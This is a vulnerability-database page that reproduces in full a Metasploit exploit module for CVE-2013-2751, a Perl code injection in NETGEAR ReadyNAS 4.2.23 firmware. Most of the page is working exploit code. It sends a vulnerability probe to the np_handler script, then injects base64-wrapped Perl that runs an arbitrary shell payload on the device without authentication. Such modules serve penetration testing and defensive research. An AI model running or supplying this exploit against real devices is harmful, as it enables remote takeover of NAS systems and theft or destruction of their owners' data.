NETGEAR ReadyNAS Perl Code Evaluation

🗓️ 01 Jul 2014 00:00:00Reported by RootType
NETGEAR ReadyNAS Perl Code Evaluation, Remote code injection vulnerability on NETGEAR ReadyNAS 4.2.23 and 4.1.1

                                                ##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require &#39;msf/core&#39;

class Metasploit3 &#60; Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      &#39;Name&#39;           =&#62; &#39;NETGEAR ReadyNAS Perl Code Evaluation&#39;,
      &#39;Description&#39;    =&#62; %q{
        This module exploits a Perl code injection on NETGEAR ReadyNAS 4.2.23 and 4.1.11. The
        vulnerability exists on the web fronted, specifically on the np_handler.pl component,
        due to the insecure usage of the eval() perl function. This module has been tested
        successfully on a NETGEAR ReadyNAS 4.2.23 Firmware emulated environment, not on real
        hardware.
      },
      &#39;Author&#39;         =&#62;
        [
          &#39;Craig Young&#39;, # Vulnerability discovery
          &#39;hdm&#39;,          # diff the patch
          &#39;juan vazquez&#39;  # Metasploit module
        ],
      &#39;License&#39;        =&#62; MSF_LICENSE,
      &#39;References&#39;     =&#62;
        [
          [ &#39;CVE&#39;, &#39;2013-2751&#39; ],
          [ &#39;OSVDB&#39;, &#39;98826&#39; ],
          [ &#39;URL&#39;, &#39;http://www.tripwire.com/state-of-security/vulnerability-management/readynas-flaw-allows-root-access-unauthenticated-http-request/&#39; ],
          [ &#39;URL&#39;, &#39;http://www.tripwire.com/register/security-advisory-netgear-readynas/&#39; ]
        ],
      &#39;Platform&#39;       =&#62; [&#39;unix&#39;],
      &#39;Arch&#39;           =&#62; ARCH_CMD,
      &#39;Privileged&#39;     =&#62; false,
      &#39;Payload&#39;        =&#62;
        {
          &#39;Space&#39;       =&#62; 4096, # Has into account Apache request length and base64 ratio
          &#39;DisableNops&#39; =&#62; true,
          &#39;Compat&#39;      =&#62;
            {
              &#39;PayloadType&#39; =&#62; &#39;cmd&#39;,
              &#39;RequiredCmd&#39; =&#62; &#39;generic perl telnet&#39;
            }
        },
      &#39;Targets&#39;        =&#62;
        [
          [ &#39;NETGEAR ReadyNAS 4.2.23&#39;, { }]
        ],
      &#39;DefaultOptions&#39; =&#62;
        {
          &#39;SSL&#39; =&#62; true
        },
      &#39;DefaultTarget&#39;  =&#62; 0,
      &#39;DisclosureDate&#39; =&#62; &#39;Jul 12 2013&#39;
      ))

    register_options(
      [
        Opt::RPORT(443)
      ], self.class)

  end

  def send_request_payload(payload)
    res = send_request_cgi({
      &#39;uri&#39; =&#62; normalize_uri(&#34;/np_handler&#34;, &#34;&#34;),
      &#39;vars_get&#39; =&#62; {
         &#39;PAGE&#39; =&#62;&#39;Nasstate&#39;,
         &#39;OPERATION&#39; =&#62; &#39;get&#39;,
         &#39;SECTION&#39; =&#62; payload
      }
    })
    return res
  end

  def check
    res = send_request_payload(&#34;)&#34;)
    if res and res.code == 200 and res.body =~ /syntax error at \(eval/
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    my_payload = &#34;#{rand_text_numeric(1)});use MIME::Base64;system(decode_base64(\&#34;#{Rex::Text.encode_base64(payload.encoded)}\&#34;)&#34;
    print_status(&#34;#{peer} - Executing payload...&#34;)
    send_request_payload(my_payload)
  end

end
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1